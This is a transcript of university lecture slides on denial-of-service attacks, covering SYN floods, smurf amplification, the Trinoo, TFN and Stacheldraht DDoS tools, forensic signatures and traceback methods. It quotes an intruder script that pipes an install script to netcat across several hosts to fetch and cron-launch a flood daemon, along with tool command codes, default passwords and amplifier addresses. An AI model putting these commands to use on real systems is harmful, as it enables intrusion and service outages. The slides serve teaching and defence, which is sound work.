denial of service cs155 spring quarter david brumley [email protected]
Post on 21-Dec-2015
218 views
TRANSCRIPT
Denial of ServiceCS155 Spring Quarter
David [email protected]
Overview
• Overview/History of DoS
• Traditional DoS
• DDoS
• Tracking DoS
• Preventative Measures
• Conclusion
Who are we talking about?
Script Kiddies
Exploit Writers
Computer Professionals
R &D Labs/UniversitiesGov’t (NSA)
Example: GRC.COM
Example: GRC.COM
hi, its me, wicked, im the one nailing the server with
udp and icmp packets, nice sisco router, btw im 13, its
a new addition, nothin tracert cant handle, and ur on a
t3.....so up ur connection foo, we will just keep comin
at you, u cant stop us "script kiddies" because we are
better than you, plain and simple.
-------------------
Yo, u might not thing of this as anyomous, but its not real info, it’s a stolen earthlink, so its good, now, to speak of the implemented attacks, yeah its me, and the reason me and my 2 other contributers do this is because in a previous post you call us “script kiddies”, at least so I was told….
Classic DoS
• Fork/malloc() bomb• Flooding
– June 1996 1st Adv. on UDP flooding
• Theme: Exploit finite queue or exposed unoptimized interface
• Fix 1: limit interface• Fix 2: optimize interface
Example: SYN Flooding
• Fix 1: Minimal state cache @ A
• Fix 2: SYN Cookies
A
B
Overall Fixing is Non-Trivial Programming
1 2Syn
Ack
SYNACK
Most Prevalent Attacks
• Jolt/jolt2: IP Fragment Reassembly (UDP and TCP)
• Stream/raped: Flood with ACK’s• Trash: IGMP Flooding• Mix UDP/TCP/ICMP flooding• Starting to target routers instead of
hosts
Distributed Attack: Smurf
…10’s to 100’s of hosts..
Amplification Networks
• Netscan.org210.95.3.128 427 (Korea)203.252.30.0 401 (Korea) 203.252.30.255 390 (Korea)210.95.3.255 300 (Korea)130.87.223.255 174 (Japan)206.101.110.127 (US)
• Average amplification: 4
Ping Attack
PING 206.101.110.127: 56 data bytesno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 sec….
Ping Attack
64 bytes from 206.101.110.1: seq=13 ttl=21 time=127 ms.64 bytes from 206.101.110.1: seq=13 ttl=21 time=171 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=175 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=181 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=185 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=216 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=220 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=222 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=229 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=230 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=241 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=243 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=248 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=254 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=259 ms, duplicate.….
Ping Attack
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1513 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
….
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
….
Ping Attack
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42) : Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time
to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceeded64 bytes from 206.101.110.1: seq=13 ttl=21 time=6917 ms, duplicate.packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time
to live exceeded
Bad guys point of view
• What to do if smurf no longer works?– Admins could disable broadcast
– Admins could filter from broadcast networks
Distributed DoS
Handlers/Masters
Agents/Daemons
Client
Building DDoS Networks
• Launch exploit
• Log in through back door
• Install daemon
• Install "rootkit" to hide daemon
• Repeat
Result of Exploit
Normal System:sunset:security> telnet elaineTrying 171.64.15.86...Connected to elaine21.stanford.edu.Escape character is '^]'.
UNIX(r) System V Release 4.0 (elaine21.Stanford.EDU)
elaine21.Stanford.EDU login:
Hacked System:sunset:security> telnet jimi-hendrix 1524
Trying 171.65.38.180...Connected to jimi-hendrix.Stanford.EDU (171.65.38.180).Escape character is '^]'.
# ls -altr /; total 1618-r-xr-xr-x 1 root root 1541 Oct 14 1998 .cshrcdrwx------ 2 root root 8192 Apr 14 1999 lost+founddrwxr-xr-x 1 root root 9 Apr 14 1999 bindrwxrwxr-x 2 root sys 512 Apr 14 1999 mnt
Example Intruder Script
• Automated exploit
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
• Trin.shecho "rcp 192.168.0.1:leaf
/usr/sbin/rpc.listen"echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo"echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \*
/usr/sbin/rpc.listen > cron"echo "crontab cron"echo "echo launched"echo "exit"
RCP
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8111]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8112]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8113]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8117]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8124]: [email protected] as demos: cmd='rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8127]: [email protected] as demos: cmd='rcp -f neet.tar'
….
Over 200 hosts compromised!
DDoS Networks
• Trinoo: June/July 1999
• TFN: August/September 1999
• Stacheldraht: Sept/October 1999
• IRC Botnet: More recent
Trinoo Overview
• Communication– Attacker to Masters(s): 27665/tcp – Master to daemon(s): 27444/udp – Daemon to Master(s): 31335/udp
• List of masters hard coded into clients
• UDP Flooder
Trinoo Master
• Daemon list blowfish encrypted• Crypt() password required for startup
# ./master ?? wrongpassword # . . . # ./master ?? gOrave trinoo v1.07d2+f3+c
Trinoo Master Commands
• die
• mtimer (set DoS timer)
• dos IP
• mdie (password required)
• mping - send "PING" command, should get a "PONG"
• mdos
• info - print version information
• msize - Set DoS packet size
• killdead - Solicits "*HELLO*" from clients, else removes entry
• bcast - list hosts
• mstop - attempt to stop DoS. Not implemented :)
Analysis of Handler
# strings - master . . .---vv1.07d2+f3+ctrinoo %sl44adsl <- Cleartext daemon passwordsock0nm1VNMX… <- crypt(g0rave) local master10:09:24Sep 26 1999trinoo %s [%s:%s]bindread*HELLO*ZsoTN.cq4X31 <- Blowfish crypt keyboredNEW Bcast - %s
PONGPONG %d Received from %sWarning: Connection from %sbeUBZbLtK7kkY <- crypt(betalmostdone)trinoo %s..[rpm8d/cb4Sx/] . . .DoS: usage: dos DoS: Packeting %s.aaa %s %smdieErDVt6azHrePE <- crypt(killme) for mdie mdie: Disabling Bcasts.d1e %smdie: password?
Daemon Forensics
• Starting the client sends "*HELLO*" to the master
• Commands of form "arg1 password arg2" - aaa pass IP - DoS IP on
random UDP ports- bbb pass N - Sets time limits - png pass - send a "PONG" to
the master on port 31335/udp - d1e pass - ...
• Note that UNIX strings by default only displays 4 or more ASCII characters!
# strings --bytes=3 ns | tail -15 socket bind recvfrom l44 %s %s %s aIf3YWfOhw.V. aaa bbb shi png PONG d1e rsz xyz *HELLO*
Trinoo LSOF
# lsof | egrep ":31335|:27665"master 1292 root 3u inet 2460 UDP *:31335master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)# lsof -p 1292COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEmaster 1292 root cwd DIR 3,1 1024 14356 /tmp/...master 1292 root rtd DIR 3,1 1024 2 /master 1292 root txt REG 3,1 30492 14357 /tmp/.../mastermaster 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.somaster 1292 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.somaster 1292 root 0u CHR 4,1 2967 /dev/tty1master 1292 root 1u CHR 4,1 2967 /dev/tty1master 1292 root 2u CHR 4,1 2967 /dev/tty1master 1292 root 3u inet 2534 UDP *:31335master 1292 root 4u inet 2535 TCP *:27665 (LISTEN)
Trinoo Forensics
• Master IP addresses visible • Enough strings to recognize daemon/master easily • Listening TCP/UDP ports can be seen with "lsof" • Attacker session not encrypted
Tribal Flood Network
• Communication:– Client to handler: none– Handler <-> agent: ICMP Echo Reply
• DOS Types– SYN– UDP– ICMP– With spoofing capabilities
TFN Handler
-------------------------------------------------------------- [tribe flood network] (c) 1999 by Mixter
usage: ./tfn [ip] [port] contains a list of numerical hosts that are ready to flood -1 for spoofmask type (specify 0-3), -2 for packet size, is 0 for stop/status, 1 for udp, 2 for syn, 3 for
icmp, 4 to bind a rootshell (specify port) 5 to smurf, first ip is target, further ips are
broadcasts[ip] target ip[s], separated by @ if more than one[port] must be given for a syn flood, 0 = RANDOM--------------------------------------------------------------------
TFN Commands
#define ID_ACK 123 /* for replies to the client */
#define ID_SHELL 456 /* to bind a rootshell, optional */
#define ID_PSIZE 789 /* to change size of udp/icmp packets */
#define ID_SWITCH 234 /* to switch spoofing mode */#define ID_STOPIT 567 /* to stop flooding */#define ID_SENDUDP 890 /* to udp flood */#define ID_SENDSYN 345 /* to syn flood */#define ID_SYNPORT 678 /* to set port */#define ID_ICMP 901 /* to icmp flood */#define ID_SMURF 666 /* haps! haps! */
Identifying an Agent
------------------------------------------------------------------------------
td 5931 root cwd DIR 3,5 1024 240721
/usr/lib/libx/...
td 5931 root rtd DIR 3,1 1024 2 /
td 5931 root txt REG 3,5 297508 240734
/usr/lib/libx/.../td
td 5931 root 3u sock 0,0 92814 can't
identify protocol
------------------------------------------------------------------------------
Network Example
# ./tfn iplist 4 12345 [tribe flood network] (c) 1999 by Mixter
# tcpdump -lnx -s 1518 icmptcpdump: listening on eth005:51:32.706829 10.0.0.1 > 192.168.0.1: icmp: echo reply .... .... .... .... .... .... .... .... .... .... 0000 64d1 01c8 0000 3132 3334 350005:51:32.741556 192.168.0.1 > 10.0.0.1: icmp: echo reply .... .... .... .... .... .... .... .... .... .... 0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420 746f 2070 6f72 7420 3132 3334 350a 00
<- 0x01C8 = 456 base 10“12345” in data portion
<- 0x007b= 123 base 10
Forensics
• Easy to spot in lsof (+)
• ICMP easy to disguise (-)
• ICMP ECHO_REPLY often allowed through firewall (-)
• Attackers session not encrypted
Stacheldraht
• Communication:– Client <-> Handler: 16660/tcp– Handler <-> agent: 65000/tcp,
ICMP_ECHOREPLY – Doesn’t use agent TCP for anything on
versions I’ve seen
• Client/handler traffic blowfish encrypted• UDP/TCP/ICMP flooding w/ spoofing
Stacheldraht Client and Handler
• Client to handler blowfish encrypted w/ password “authentication”
• Handler password “sicken” encrypted with crypt()
• More proactive at identifying live/dead hosts: Similar to distributed network
• Handler limited to 1000 agents
Handler Strings
starting trinoo emulation...removing useful commands.- DONE -available commands in this version are:--------------------------------------------------.mtimer .mudp .micmp .msyn .msort .mping.madd .mlist .msadd .msrem .distro .help.setusize .setisize .mdie .sprange .mstop .killall.showdead .showaliveusage: .distro <user> <server that runs rcp>remember : the distro files need to be executable!that means: chmod +x linux.bin , chmod +x sol.bin ;))sending distro request to all bcasts.... user : %srcp server :
Stacheldraht Agent
• Interesting addition: Upgrade feature via rcp
• Attempts spoofed packet to handler to test if spoofing is possible
• Handlers compiled in or can be in blowfish encrypted file (def pass = “randomsucks”)
• On start sends to handler ID value 666 with data “skillz”, handler responds 667 with data “ficken”
DoS BotNets
• Scan for vulnerable hosts• Infect• Join IRC channel and wait for
further commands• Generally used for warez
distribution as well• Example: Kaiten
Fighting DDoS:Identify Agents
• Strings of master in daemon
• Finding master is important!
• Dump and log as much as possible
Identifying DDoS Agents
• Counter-espionage/intrusion– Identify intruders signature
– Look for that signature
• RID
RID Examples
start AgentStacheldraht
send icmp type=0 id=668 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht
start AgentStacheldraht4
send icmp type=0 id=6268 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht4
More RID Examples
start AgentTFN
send icmp type=0 id=789
recv icmp type=0 id=123 nmatch=2
end AgentTFN
start AgentTrinoo
send udp dport=27444 data="png l44adsl"
recv udp data="PONG" nmatch=1
end AgentTrinoo
RID @ Stanford
• start telnetd send tcp dport=7000 data="\r\n" recv tcp data="Ataman Telnetd" nmatch=1end telnetd• ./rid -t 20 -b 255 -n 2 171.64.0.0/16**** 171.64.250.82 infected with telnetd**** 171.64.245.132 infected with telnetd**** 171.64.245.76 infected with telnetd**** 171.64.245.22 infected with telnetd**** 171.64.241.116 infected with telnetd…
• 156 Total!
General DDoS Observations
• Intruders mix encryption mechanisms
• No architecture in security design
• Easily recognizable via strings
Defending against DoS
• Resisting DoS– Filtering– Traffic Shaping– Pure filtering
• Ingress = incoming• Egress = outgoing
• Locating attacker(s)– Logging– Automatic trace back– Packet tagging
Logging
• Audit utilities:– Tcpdump
– Argus
– Cisco Netflow
• Problem: huge data sets
• Asta.com: netflow monitor
Input Logging
1. Log on to nearest router
2. Enable input debugging on router
3. Find upstream4. Recurse
v
a
Controlled Flooding
• Cheswick & Burch
• Idea: Follow the slowest routers
• Problems: obvious
Victim
Attacker
R1 R2
R3
Node Sampling - Savage et alMethod 1
• Use fragment ID• Mark packets with
prob. p of router address
• Issues:– p > 0.5– Long time to infer
path (-)– Multiple attackers at
same dist (-)
R1
R2
R3 R4
R5
R6
Victim
Attacker
p
p(p-1)
p(p-1)2
Method 2: Edge Sampling
• Add 3 fields:– 2 IP addresses
making edge– Distance vector
• Issues:– Space requirements
(-)– p can be arbitrary (+)– Complexity (-)
R1
R2
R3 R4
R5
R6
Victim
Attacker
R2, R6
R3, R2
A, R3
Fmt = Src,Dst
Savage’s Compression Method
• decides to fill in edge ID with prob. P. Set d=0
• Step 2a: next hop b notices d=0, writes b xor a; d++
• Step 2b: next hop notices d !=0, d++;
R1
R2
R3
A
V Get R1’s addr
R2 xor R1 xor R1 = R2
R3 xor R2 xor R2 = R3
Issues with Savage
• Spread edge identification across multiple packets (+)
• Combinatorial complexity during edge identification (-) (Fixed by Dean, Franklin, Stubblefield alg.)
• Reuse of IP fragment field (-)• Does not work on existing hardware
(IRL) (-)
Research Areas
• How vulnerable are P2P protocols?• How can we better identify the
person vs. the program?• Automatic migration during an
attack
Resources
• Packetstormsecurity.com - DDOS Tools
• Theorygroup.com - RID• www.washington.edu/People/dad
David Dittrich’s analysis• www.cert.org/reports/dsit_worksho
p.pdf CERT dealing with DDoS
Questions?
The End
Attacks Happen
General Direction
• Encrypted traffic
• Real software lifecycles
• Target name servers and other essential network equipment